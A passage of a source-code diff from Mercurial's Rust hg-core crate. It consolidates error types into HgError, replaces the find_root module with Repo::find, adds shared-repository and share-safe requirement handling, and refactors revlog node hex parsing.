- let mut old_results = None; - - // Step 2: recursively check the working directory for changes if - // needed - for (dir, dispatch) in work { - match dispatch { - Dispatch::Directory { was_file } => { - if was_file { - results.push((dir.to_owned(), Dispatch::Removed)); - } - if self.options.list_ignored - || self.options.list_unknown - && !self.dir_ignore(&dir) - { - if old_results.is_none() { - old_results = - Some(results.iter().cloned().collect()); - } - self.traverse( - &dir, - old_results - .as_ref() - .expect("old results should exist"), - &mut results, - traversed_sender.clone(), - ); - } - } - _ => { - unreachable!("There can only be directories in `work`") - } - } - } - } - - drop(traversed_sender); - let traversed = traversed_receiver.into_iter().collect(); - - Ok(build_response(results, traversed)) - } -} - -#[cfg(not(feature = "dirstate-tree"))] impl<'a, M: Matcher + Sync> Status<'a, M> { pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> { let (traversed_sender, traversed_receiver) = diff --git a/rust/hg-core/src/operations/find_root.rs b/rust/hg-core/src/operations/find_root.rs deleted file mode 100644 --- a/rust/hg-core/src/operations/find_root.rs +++ /dev/null @@ -1,100 +0,0 @@ -use std::fmt; -use std::path::{Path, PathBuf}; - -/// Kind of error encoutered by FindRoot -#[derive(Debug)] -pub enum FindRootErrorKind { - /// Root of the repository has not been found - /// Contains the current directory used by FindRoot - RootNotFound(PathBuf), - /// The current directory does not exists or permissions are insufficient - /// to get access to it - GetCurrentDirError(std::io::Error), -} - -/// A FindRoot error -#[derive(Debug)] -pub struct FindRootError { - /// Kind of error encoutered by FindRoot - pub kind: FindRootErrorKind, -} - -impl std::error::Error for FindRootError {} - -impl fmt::Display for FindRootError { - fn fmt(&self, _f: &mut fmt::Formatter<'_>) -> fmt::Result { - unimplemented!() - } -} - -/// Find the root of the 
repository -/// by searching for a .hg directory in the process’ current directory and its -/// ancestors -pub fn find_root() -> Result<PathBuf, FindRootError> { - let current_dir = std::env::current_dir().map_err(|e| FindRootError { - kind: FindRootErrorKind::GetCurrentDirError(e), - })?; - Ok(find_root_from_path(¤t_dir)?.into()) -} - -/// Find the root of the repository -/// by searching for a .hg directory in the given directory and its ancestors -pub fn find_root_from_path(start: &Path) -> Result<&Path, FindRootError> { - if start.join(".hg").exists() { - return Ok(start); - } - for ancestor in start.ancestors() { - if ancestor.join(".hg").exists() { - return Ok(ancestor); - } - } - Err(FindRootError { - kind: FindRootErrorKind::RootNotFound(start.into()), - }) -} - -#[cfg(test)] -mod tests { - use super::*; - use std::fs; - use tempfile; - - #[test] - fn dot_hg_not_found() { - let tmp_dir = tempfile::tempdir().unwrap(); - let path = tmp_dir.path(); - - let err = find_root_from_path(&path).unwrap_err(); - - // TODO do something better - assert!(match err { - FindRootError { kind } => match kind { - FindRootErrorKind::RootNotFound(p) => p == path.to_path_buf(), - _ => false, - }, - }) - } - - #[test] - fn dot_hg_in_current_path() { - let tmp_dir = tempfile::tempdir().unwrap(); - let root = tmp_dir.path(); - fs::create_dir_all(root.join(".hg")).unwrap(); - - let result = find_root_from_path(&root).unwrap(); - - assert_eq!(result, root) - } - - #[test] - fn dot_hg_in_parent() { - let tmp_dir = tempfile::tempdir().unwrap(); - let root = tmp_dir.path(); - fs::create_dir_all(root.join(".hg")).unwrap(); - - let directory = root.join("some/nested/directory"); - let result = find_root_from_path(&directory).unwrap(); - - assert_eq!(result, root) - } -} /* tests */ diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ 
b/rust/hg-core/src/operations/list_tracked_files.rs @@ -6,47 +6,15 @@ // GNU General Public License version 2 or any later version. use crate::dirstate::parsers::parse_dirstate; +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::manifest::{Manifest, ManifestEntry}; -use crate::revlog::node::{Node, NodePrefix}; +use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; -use crate::revlog::Revision; use crate::utils::hg_path::HgPath; -use crate::{DirstateParseError, EntryState}; +use crate::EntryState; use rayon::prelude::*; -use std::convert::From; - -/// Kind of error encountered by `ListDirstateTrackedFiles` -#[derive(Debug)] -pub enum ListDirstateTrackedFilesErrorKind { - /// Error when reading the `dirstate` file - IoError(std::io::Error), - /// Error when parsing the `dirstate` file - ParseError(DirstateParseError), -} - -/// A `ListDirstateTrackedFiles` error -#[derive(Debug)] -pub struct ListDirstateTrackedFilesError { - /// Kind of error encountered by `ListDirstateTrackedFiles` - pub kind: ListDirstateTrackedFilesErrorKind, -} - -impl From<ListDirstateTrackedFilesErrorKind> - for ListDirstateTrackedFilesError -{ - fn from(kind: ListDirstateTrackedFilesErrorKind) -> Self { - ListDirstateTrackedFilesError { kind } - } -} - -impl From<std::io::Error> for ListDirstateTrackedFilesError { - fn from(err: std::io::Error) -> Self { - let kind = ListDirstateTrackedFilesErrorKind::IoError(err); - ListDirstateTrackedFilesError { kind } - } -} /// List files under Mercurial control in the working directory /// by reading the dirstate @@ -56,16 +24,13 @@ } impl Dirstate { - pub fn new(repo: &Repo) -> Result<Self, ListDirstateTrackedFilesError> { + pub fn new(repo: &Repo) -> Result<Self, HgError> { let content = repo.hg_vfs().read("dirstate")?; Ok(Self { content }) } - pub fn tracked_files( - &self, - ) -> Result<Vec<&HgPath>, ListDirstateTrackedFilesError> { - let (_, entries, _) = 
parse_dirstate(&self.content) - .map_err(ListDirstateTrackedFilesErrorKind::ParseError)?; + pub fn tracked_files(&self) -> Result<Vec<&HgPath>, HgError> { + let (_, entries, _) = parse_dirstate(&self.content)?; let mut files: Vec<&HgPath> = entries .into_iter() .filter_map(|(path, entry)| match entry.state { @@ -78,81 +43,18 @@ } } -/// Kind of error encountered by `ListRevTrackedFiles` -#[derive(Debug)] -pub enum ListRevTrackedFilesErrorKind { - /// Error when reading a `revlog` file. - IoError(std::io::Error), - /// The revision has not been found. - InvalidRevision, - /// Found more than one revision whose ID match the requested prefix - AmbiguousPrefix, - /// A `revlog` file is corrupted. - CorruptedRevlog, - /// The `revlog` format version is not supported. - UnsuportedRevlogVersion(u16), - /// The `revlog` data format is not supported. - UnknowRevlogDataFormat(u8), -} - -/// A `ListRevTrackedFiles` error -#[derive(Debug)] -pub struct ListRevTrackedFilesError { - /// Kind of error encountered by `ListRevTrackedFiles` - pub kind: ListRevTrackedFilesErrorKind, -} - -impl From<ListRevTrackedFilesErrorKind> for ListRevTrackedFilesError { - fn from(kind: ListRevTrackedFilesErrorKind) -> Self { - ListRevTrackedFilesError { kind } - } -} - -impl From<RevlogError> for ListRevTrackedFilesError { - fn from(err: RevlogError) -> Self { - match err { - RevlogError::IoError(err) => { - ListRevTrackedFilesErrorKind::IoError(err) - } - RevlogError::UnsuportedVersion(version) => { - ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) - } - RevlogError::InvalidRevision => { - ListRevTrackedFilesErrorKind::InvalidRevision - } - RevlogError::AmbiguousPrefix => { - ListRevTrackedFilesErrorKind::AmbiguousPrefix - } - RevlogError::Corrupted => { - ListRevTrackedFilesErrorKind::CorruptedRevlog - } - RevlogError::UnknowDataFormat(format) => { - ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) - } - } - .into() - } -} - /// List files under Mercurial control at a 
given revision. pub fn list_rev_tracked_files( repo: &Repo, - rev: &str, -) -> Result<FilesForRev, ListRevTrackedFilesError> { + revset: &str, +) -> Result<FilesForRev, RevlogError> { + let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; - - let changelog_entry = match rev.parse::<Revision>() { - Ok(rev) => changelog.get_rev(rev)?, - _ => { - let changelog_node = NodePrefix::from_hex(&rev) - .or(Err(ListRevTrackedFilesErrorKind::InvalidRevision))?; - changelog.get_node(changelog_node.borrow())? - } - }; - let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?; - let manifest_entry = manifest.get_node((&manifest_node).into())?; + let changelog_entry = changelog.get_rev(rev)?; + let manifest_node = + Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; + let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -5,19 +5,8 @@ mod cat; mod debugdata; mod dirstate_status; -mod find_root; mod list_tracked_files; -pub use cat::{cat, CatRevError, CatRevErrorKind}; -pub use debugdata::{ - debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind, -}; -pub use find_root::{ - find_root, find_root_from_path, FindRootError, FindRootErrorKind, -}; -pub use list_tracked_files::{ - list_rev_tracked_files, FilesForRev, ListRevTrackedFilesError, - ListRevTrackedFilesErrorKind, -}; -pub use list_tracked_files::{ - Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind, -}; +pub use cat::{cat, CatOutput}; +pub use debugdata::{debug_data, DebugDataKind}; +pub use list_tracked_files::Dirstate; +pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; diff --git a/rust/hg-core/src/repo.rs 
b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,6 +1,10 @@ -use crate::operations::{find_root, FindRootError}; +use crate::config::{Config, ConfigError, ConfigParseError}; +use crate::errors::{HgError, IoErrorContext, IoResultExt}; use crate::requirements; +use crate::utils::files::get_path_from_bytes; +use crate::utils::SliceExt; use memmap::{Mmap, MmapOptions}; +use std::collections::HashSet; use std::path::{Path, PathBuf}; /// A repository on disk @@ -8,85 +12,255 @@ working_directory: PathBuf, dot_hg: PathBuf, store: PathBuf, + requirements: HashSet<String>, + config: Config, +} + +#[derive(Debug, derive_more::From)] +pub enum RepoError { + NotFound { + at: PathBuf, + }, + #[from] + ConfigParseError(ConfigParseError), + #[from] + Other(HgError), +} + +impl From<ConfigError> for RepoError { + fn from(error: ConfigError) -> Self { + match error { + ConfigError::Parse(error) => error.into(), + ConfigError::Other(error) => error.into(), + } + } } /// Filesystem access abstraction for the contents of a given "base" diretory #[derive(Clone, Copy)] -pub(crate) struct Vfs<'a> { - base: &'a Path, +pub struct Vfs<'a> { + pub(crate) base: &'a Path, } impl Repo { - /// Returns `None` if the given path doesn’t look like a repository - /// (doesn’t contain a `.hg` sub-directory). - pub fn for_path(root: impl Into<PathBuf>) -> Self { - let working_directory = root.into(); - let dot_hg = working_directory.join(".hg"); - Self { - store: dot_hg.join("store"), - dot_hg, - working_directory, + /// Find a repository, either at the given path (which must contain a `.hg` + /// sub-directory) or by searching the current directory and its + /// ancestors. + /// + /// A method with two very different "modes" like this usually a code smell + /// to make two methods instead, but in this case an `Option` is what rhg + /// sub-commands get from Clap for the `-R` / `--repository` CLI argument. 
+ /// Having two methods would just move that `if` to almost all callers. + pub fn find( + config: &Config, + explicit_path: Option<&Path>, + ) -> Result<Self, RepoError> { + if let Some(root) = explicit_path { + if root.join(".hg").is_dir() { + Self::new_at_path(root.to_owned(), config) + } else if root.is_file() { + Err(HgError::unsupported("bundle repository").into()) + } else { + Err(RepoError::NotFound { + at: root.to_owned(), + }) + } + } else { + let current_directory = crate::utils::current_dir()?; + // ancestors() is inclusive: it first yields `current_directory` + // as-is. + for ancestor in current_directory.ancestors() { + if ancestor.join(".hg").is_dir() { + return Self::new_at_path(ancestor.to_owned(), config); + } + } + Err(RepoError::NotFound { + at: current_directory, + }) } } - pub fn find() -> Result<Self, FindRootError> { - find_root().map(Self::for_path) - } + /// To be called after checking that `.hg` is a sub-directory + fn new_at_path( + working_directory: PathBuf, + config: &Config, + ) -> Result<Self, RepoError> { + let dot_hg = working_directory.join(".hg"); + + let mut repo_config_files = Vec::new(); + repo_config_files.push(dot_hg.join("hgrc")); + repo_config_files.push(dot_hg.join("hgrc-not-shared")); + + let hg_vfs = Vfs { base: &dot_hg }; + let mut reqs = requirements::load_if_exists(hg_vfs)?; + let relative = + reqs.contains(requirements::RELATIVE_SHARED_REQUIREMENT); + let shared = + reqs.contains(requirements::SHARED_REQUIREMENT) || relative; + + // From `mercurial/localrepo.py`: + // + // if .hg/requires contains the sharesafe requirement, it means + // there exists a `.hg/store/requires` too and we should read it + // NOTE: presence of SHARESAFE_REQUIREMENT imply that store requirement + // is present. 
We never write SHARESAFE_REQUIREMENT for a repo if store + // is not present, refer checkrequirementscompat() for that + // + // However, if SHARESAFE_REQUIREMENT is not present, it means that the + // repository was shared the old way. We check the share source + // .hg/requires for SHARESAFE_REQUIREMENT to detect whether the + // current repository needs to be reshared + let share_safe = reqs.contains(requirements::SHARESAFE_REQUIREMENT); + + let store_path; + if !shared { + store_path = dot_hg.join("store"); + } else { + let bytes = hg_vfs.read("sharedpath")?; + let mut shared_path = + get_path_from_bytes(bytes.trim_end_newlines()).to_owned(); + if relative { + shared_path = dot_hg.join(shared_path) + } + if !shared_path.is_dir() { + return Err(HgError::corrupted(format!( + ".hg/sharedpath points to nonexistent directory {}", + shared_path.display() + )) + .into()); + } + + store_path = shared_path.join("store"); - pub fn check_requirements( - &self, - ) -> Result<(), requirements::RequirementsError> { - requirements::check(self) + let source_is_share_safe = + requirements::load(Vfs { base: &shared_path })? 
+ .contains(requirements::SHARESAFE_REQUIREMENT); + + if share_safe && !source_is_share_safe { + return Err(match config + .get(b"share", b"safe-mismatch.source-not-safe") + { + Some(b"abort") | None => HgError::abort( + "abort: share source does not support share-safe requirement\n\ + (see `hg help config.format.use-share-safe` for more information)", + ), + _ => HgError::unsupported("share-safe downgrade"), + } + .into()); + } else if source_is_share_safe && !share_safe { + return Err( + match config.get(b"share", b"safe-mismatch.source-safe") { + Some(b"abort") | None => HgError::abort( + "abort: version mismatch: source uses share-safe \ + functionality while the current share does not\n\ + (see `hg help config.format.use-share-safe` for more information)", + ), + _ => HgError::unsupported("share-safe upgrade"), + } + .into(), + ); + } + + if share_safe { + repo_config_files.insert(0, shared_path.join("hgrc")) + } + } + if share_safe { + reqs.extend(requirements::load(Vfs { base: &store_path })?); + } + + let repo_config = if std::env::var_os("HGRCSKIPREPO").is_none() { + config.combine_with_repo(&repo_config_files)? + } else { + config.clone() + }; + + let repo = Self { + requirements: reqs, + working_directory, + store: store_path, + dot_hg, + config: repo_config, + }; + + requirements::check(&repo)?; + + Ok(repo) } pub fn working_directory_path(&self) -> &Path { &self.working_directory } + pub fn requirements(&self) -> &HashSet<String> { + &self.requirements + } + + pub fn config(&self) -> &Config { + &self.config + } + /// For accessing repository files (in `.hg`), except for the store /// (`.hg/store`). 
- pub(crate) fn hg_vfs(&self) -> Vfs<'_> { + pub fn hg_vfs(&self) -> Vfs<'_> { Vfs { base: &self.dot_hg } } /// For accessing repository store files (in `.hg/store`) - pub(crate) fn store_vfs(&self) -> Vfs<'_> { + pub fn store_vfs(&self) -> Vfs<'_> { Vfs { base: &self.store } } /// For accessing the working copy - - // The undescore prefix silences the "never used" warning. Remove before - // using. - pub(crate) fn _working_directory_vfs(&self) -> Vfs<'_> { + pub fn working_directory_vfs(&self) -> Vfs<'_> { Vfs { base: &self.working_directory, } } + + pub fn dirstate_parents( + &self, + ) -> Result<crate::dirstate::DirstateParents, HgError> { + let dirstate = self.hg_vfs().mmap_open("dirstate")?; + let parents = + crate::dirstate::parsers::parse_dirstate_parents(&dirstate)?; + Ok(parents.clone()) + } } impl Vfs<'_> { - pub(crate) fn read( + pub fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf { + self.base.join(relative_path) + } + + pub fn read( &self, relative_path: impl AsRef<Path>, - ) -> std::io::Result<Vec<u8>> { - std::fs::read(self.base.join(relative_path)) + ) -> Result<Vec<u8>, HgError> { + let path = self.join(relative_path); + std::fs::read(&path).when_reading_file(&path) } - pub(crate) fn open( + pub fn mmap_open( &self, relative_path: impl AsRef<Path>, - ) -> std::io::Result<std::fs::File> { - std::fs::File::open(self.base.join(relative_path)) + ) -> Result<Mmap, HgError> { + let path = self.base.join(relative_path); + let file = std::fs::File::open(&path).when_reading_file(&path)?; + // TODO: what are the safety requirements here? + let mmap = unsafe { MmapOptions::new().map(&file) } + .when_reading_file(&path)?; + Ok(mmap) } - pub(crate) fn mmap_open( + pub fn rename( &self, - relative_path: impl AsRef<Path>, - ) -> std::io::Result<Mmap> { - let file = self.open(relative_path)?; - // TODO: what are the safety requirements here? 
- let mmap = unsafe { MmapOptions::new().map(&file) }?; - Ok(mmap) + relative_from: impl AsRef<Path>, + relative_to: impl AsRef<Path>, + ) -> Result<(), HgError> { + let from = self.join(relative_from); + let to = self.join(relative_to); + std::fs::rename(&from, &to) + .with_context(|| IoErrorContext::RenamingFile { from, to }) } } diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,19 +1,9 @@ -use crate::repo::Repo; -use std::io; +use crate::errors::{HgError, HgResultExt}; +use crate::repo::{Repo, Vfs}; +use crate::utils::join_display; +use std::collections::HashSet; -#[derive(Debug)] -pub enum RequirementsError { - // TODO: include a path? - Io(io::Error), - /// The `requires` file is corrupted - Corrupted, - /// The repository requires a feature that we don't support - Unsupported { - feature: String, - }, -} - -fn parse(bytes: &[u8]) -> Result<Vec<String>, ()> { +fn parse(bytes: &[u8]) -> Result<HashSet<String>, HgError> { // The Python code reading this file uses `str.splitlines` // which looks for a number of line separators (even including a couple of // non-ASCII ones), but Python code writing it always uses `\n`. @@ -27,16 +17,20 @@ if line[0].is_ascii_alphanumeric() && line.is_ascii() { Ok(String::from_utf8(line.into()).unwrap()) } else { - Err(()) + Err(HgError::corrupted("parse error in 'requires' file")) } }) .collect() } -pub fn load(repo: &Repo) -> Result<Vec<String>, RequirementsError> { - match repo.hg_vfs().read("requires") { - Ok(bytes) => parse(&bytes).map_err(|()| RequirementsError::Corrupted), +pub(crate) fn load(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { + parse(&hg_vfs.read("requires")?) +} +pub(crate) fn load_if_exists(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { + if let Some(bytes) = hg_vfs.read("requires").io_not_found_as_none()? { + parse(&bytes) + } else { // Treat a missing file the same as an empty file. 
// From `mercurial/localrepo.py`: // > requires file contains a newline-delimited list of @@ -44,33 +38,121 @@ // > the repository. This file was introduced in Mercurial 0.9.2, // > which means very old repositories may not have one. We assume // > a missing file translates to no requirements. - Err(error) if error.kind() == std::io::ErrorKind::NotFound => { - Ok(Vec::new()) - } - - Err(error) => Err(RequirementsError::Io(error))?, + Ok(HashSet::new()) } } -pub fn check(repo: &Repo) -> Result<(), RequirementsError> { - for feature in load(repo)? { - if !SUPPORTED.contains(&&*feature) { - return Err(RequirementsError::Unsupported { feature }); - } +pub(crate) fn check(repo: &Repo) -> Result<(), HgError> { + let unknown: Vec<_> = repo + .requirements() + .iter() + .map(String::as_str) + // .filter(|feature| !ALL_SUPPORTED.contains(feature.as_str())) + .filter(|feature| { + !REQUIRED.contains(feature) && !SUPPORTED.contains(feature) + }) + .collect(); + if !unknown.is_empty() { + return Err(HgError::unsupported(format!( + "repository requires feature unknown to this Mercurial: {}", + join_display(&unknown, ", ") + ))); + } + let missing: Vec<_> = REQUIRED + .iter() + .filter(|&&feature| !repo.requirements().contains(feature)) + .collect(); + if !missing.is_empty() { + return Err(HgError::unsupported(format!( + "repository is missing feature required by this Mercurial: {}", + join_display(&missing, ", ") + ))); } Ok(()) } -// TODO: set this to actually-supported features +/// rhg does not support repositories that are *missing* any of these features +const REQUIRED: &[&str] = &["revlogv1", "store", "fncache", "dotencode"]; + +/// rhg supports repository with or without these const SUPPORTED: &[&str] = &[ - "dotencode", - "fncache", "generaldelta", - "revlogv1", - "sparserevlog", - "store", + SHARED_REQUIREMENT, + SHARESAFE_REQUIREMENT, + SPARSEREVLOG_REQUIREMENT, + RELATIVE_SHARED_REQUIREMENT, + REVLOG_COMPRESSION_ZSTD, // As of this writing everything rhg does is 
read-only. // When it starts writing to the repository, it’ll need to either keep the // persistent nodemap up to date or remove this entry: - "persistent-nodemap", + NODEMAP_REQUIREMENT, ]; + +// Copied from mercurial/requirements.py: + +/// When narrowing is finalized and no longer subject to format changes, +/// we should move this to just "narrow" or similar. +#[allow(unused)] +pub(crate) const NARROW_REQUIREMENT: &str = "narrowhg-experimental"; + +/// Enables sparse working directory usage +#[allow(unused)] +pub(crate) const SPARSE_REQUIREMENT: &str = "exp-sparse"; + +/// Enables the internal phase which is used to hide changesets instead +/// of stripping them +#[allow(unused)] +pub(crate) const INTERNAL_PHASE_REQUIREMENT: &str = "internal-phase"; + +/// Stores manifest in Tree structure +#[allow(unused)] +pub(crate) const TREEMANIFEST_REQUIREMENT: &str = "treemanifest"; + +/// Increment the sub-version when the revlog v2 format changes to lock out old +/// clients. +#[allow(unused)] +pub(crate) const REVLOGV2_REQUIREMENT: &str = "exp-revlogv2.1"; + +/// A repository with the sparserevlog feature will have delta chains that +/// can spread over a larger span. Sparse reading cuts these large spans into +/// pieces, so that each piece isn't too big. +/// Without the sparserevlog capability, reading from the repository could use +/// huge amounts of memory, because the whole span would be read at once, +/// including all the intermediate revisions that aren't pertinent for the +/// chain. This is why once a repository has enabled sparse-read, it becomes +/// required. +#[allow(unused)] +pub(crate) const SPARSEREVLOG_REQUIREMENT: &str = "sparserevlog"; + +/// A repository with the sidedataflag requirement will allow to store extra +/// information for revision without altering their original hashes. 
+#[allow(unused)] +pub(crate) const SIDEDATA_REQUIREMENT: &str = "exp-sidedata-flag"; + +/// A repository with the the copies-sidedata-changeset requirement will store +/// copies related information in changeset's sidedata. +#[allow(unused)] +pub(crate) const COPIESSDC_REQUIREMENT: &str = "exp-copies-sidedata-changeset"; + +/// The repository use persistent nodemap for the changelog and the manifest. +#[allow(unused)] +pub(crate) const NODEMAP_REQUIREMENT: &str = "persistent-nodemap"; + +/// Denotes that the current repository is a share +#[allow(unused)] +pub(crate) const SHARED_REQUIREMENT: &str = "shared"; + +/// Denotes that current repository is a share and the shared source path is +/// relative to the current repository root path +#[allow(unused)] +pub(crate) const RELATIVE_SHARED_REQUIREMENT: &str = "relshared"; + +/// A repository with share implemented safely. The repository has different +/// store and working copy requirements i.e. both `.hg/requires` and +/// `.hg/store/requires` are present. +#[allow(unused)] +pub(crate) const SHARESAFE_REQUIREMENT: &str = "share-safe"; + +/// A repository that use zstd compression inside its revlog +#[allow(unused)] +pub(crate) const REVLOG_COMPRESSION_ZSTD: &str = "revlog-compression-zstd"; diff --git a/rust/hg-core/src/revlog.rs b/rust/hg-core/src/revlog.rs --- a/rust/hg-core/src/revlog.rs +++ b/rust/hg-core/src/revlog.rs @@ -9,7 +9,7 @@ pub mod nodemap; mod nodemap_docket; pub mod path_encode; -pub use node::{Node, NodeError, NodePrefix, NodePrefixRef}; +pub use node::{FromHexError, Node, NodePrefix}; pub mod changelog; pub mod index; pub mod manifest; @@ -35,6 +35,9 @@ #[allow(clippy::unreadable_literal)] pub const WORKING_DIRECTORY_REVISION: Revision = 0x7fffffff; +pub const WORKING_DIRECTORY_HEX: &str = + "ffffffffffffffffffffffffffffffffffffffff"; + /// The simplest expression of what we need of Mercurial DAGs. pub trait Graph { /// Return the two parents of the given `Revision`. 
diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ -1,12 +1,13 @@ +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefixRef; use crate::revlog::Revision; +use crate::revlog::{Node, NodePrefix}; /// A specialized `Revlog` to work with `changelog` data format. pub struct Changelog { /// The generic `revlog` format. - revlog: Revlog, + pub(crate) revlog: Revlog, } impl Changelog { @@ -19,7 +20,7 @@ /// Return the `ChangelogEntry` a given node id. pub fn get_node( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<ChangelogEntry, RevlogError> { let rev = self.revlog.get_node_rev(node)?; self.get_rev(rev) @@ -33,6 +34,10 @@ let bytes = self.revlog.get_rev_data(rev)?; Ok(ChangelogEntry { bytes }) } + + pub fn node_from_rev(&self, rev: Revision) -> Option<&Node> { + Some(self.revlog.index.get_entry(rev)?.hash()) + } } /// `Changelog` entry which knows how to interpret the `changelog` data bytes. @@ -53,6 +58,8 @@ /// Return the node id of the `manifest` referenced by this `changelog` /// entry. 
pub fn manifest_node(&self) -> Result<&[u8], RevlogError> { - self.lines().next().ok_or(RevlogError::Corrupted) + self.lines() + .next() + .ok_or_else(|| HgError::corrupted("empty changelog entry").into()) } } diff --git a/rust/hg-core/src/revlog/index.rs b/rust/hg-core/src/revlog/index.rs --- a/rust/hg-core/src/revlog/index.rs +++ b/rust/hg-core/src/revlog/index.rs @@ -3,6 +3,7 @@ use byteorder::{BigEndian, ByteOrder}; +use crate::errors::HgError; use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; use crate::revlog::{Revision, NULL_REVISION}; @@ -44,7 +45,8 @@ offsets: Some(offsets), }) } else { - Err(RevlogError::Corrupted) + Err(HgError::corrupted("unexpected inline revlog length") + .into()) } } else { Ok(Self { @@ -298,12 +300,12 @@ // Remaining offset bytes. bytes.extend(&[0u8; 2]); } else { - // Offset is only 6 bytes will usize is 8. - bytes.extend(&self.offset.to_be_bytes()[2..]); + // Offset stored on 48 bits (6 bytes) + bytes.extend(&(self.offset as u64).to_be_bytes()[2..]); } bytes.extend(&[0u8; 2]); // Revision flags. - bytes.extend(&self.compressed_len.to_be_bytes()[4..]); - bytes.extend(&self.uncompressed_len.to_be_bytes()[4..]); + bytes.extend(&(self.compressed_len as u32).to_be_bytes()); + bytes.extend(&(self.uncompressed_len as u32).to_be_bytes()); bytes.extend(&self.base_revision.to_be_bytes()); bytes } diff --git a/rust/hg-core/src/revlog/manifest.rs b/rust/hg-core/src/revlog/manifest.rs --- a/rust/hg-core/src/revlog/manifest.rs +++ b/rust/hg-core/src/revlog/manifest.rs @@ -1,6 +1,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefixRef; +use crate::revlog::NodePrefix; use crate::revlog::Revision; use crate::utils::hg_path::HgPath; @@ -20,7 +20,7 @@ /// Return the `ManifestEntry` of a given node id. 
pub fn get_node( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<ManifestEntry, RevlogError> { let rev = self.revlog.get_node_rev(node)?; self.get_rev(rev) diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -8,8 +8,10 @@ //! In Mercurial code base, it is customary to call "a node" the binary SHA //! of a revision. -use hex::{self, FromHex, FromHexError}; +use crate::errors::HgError; +use bytes_cast::BytesCast; use std::convert::{TryFrom, TryInto}; +use std::fmt; /// The length in bytes of a `Node` /// @@ -29,6 +31,9 @@ /// see also `NODES_BYTES_LENGTH` about it being private. const NODE_NYBBLES_LENGTH: usize = 2 * NODE_BYTES_LENGTH; +/// Default for UI presentation +const SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH: u8 = 12; + /// Private alias for readability and to ease future change type NodeData = [u8; NODE_BYTES_LENGTH]; @@ -45,11 +50,10 @@ /// if they need a loop boundary. /// /// All methods that create a `Node` either take a type that enforces -/// the size or fail immediately at runtime with [`ExactLengthRequired`]. +/// the size or return an error at runtime. 
/// /// [`nybbles_len`]: #method.nybbles_len -/// [`ExactLengthRequired`]: struct.NodeError#variant.ExactLengthRequired -#[derive(Clone, Debug, PartialEq)] +#[derive(Copy, Clone, Debug, PartialEq, BytesCast, derive_more::From)] #[repr(transparent)] pub struct Node { data: NodeData, @@ -60,32 +64,49 @@ data: [0; NODE_BYTES_LENGTH], }; -impl From<NodeData> for Node { - fn from(data: NodeData) -> Node { - Node { data } +/// Return an error if the slice has an unexpected length +impl<'a> TryFrom<&'a [u8]> for &'a Node { + type Error = (); + + #[inline] + fn try_from(bytes: &'a [u8]) -> Result<Self, Self::Error> { + match Node::from_bytes(bytes) { + Ok((node, rest)) if rest.is_empty() => Ok(node), + _ => Err(()), + } } } /// Return an error if the slice has an unexpected length -impl<'a> TryFrom<&'a [u8]> for &'a Node { +impl TryFrom<&'_ [u8]> for Node { type Error = std::array::TryFromSliceError; #[inline] - fn try_from(bytes: &'a [u8]) -> Result<&'a Node, Self::Error> { + fn try_from(bytes: &'_ [u8]) -> Result<Self, Self::Error> { let data = bytes.try_into()?; - // Safety: `#[repr(transparent)]` makes it ok to "wrap" the target - // of a reference to the type of the single field. - Ok(unsafe { std::mem::transmute::<&NodeData, &Node>(data) }) + Ok(Self { data }) } } -#[derive(Debug, PartialEq)] -pub enum NodeError { - ExactLengthRequired(usize, String), - PrefixTooLong(String), - HexError(FromHexError, String), +impl From<&'_ NodeData> for Node { + #[inline] + fn from(data: &'_ NodeData) -> Self { + Self { data: *data } + } } +impl fmt::LowerHex for Node { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + for &byte in &self.data { + write!(f, "{:02x}", byte)? + } + Ok(()) + } +} + +#[derive(Debug)] +pub struct FromHexError; + /// Low level utility function, also for prefixes fn get_nybble(s: &[u8], i: usize) -> u8 { if i % 2 == 0 { @@ -117,18 +138,26 @@ /// /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. 
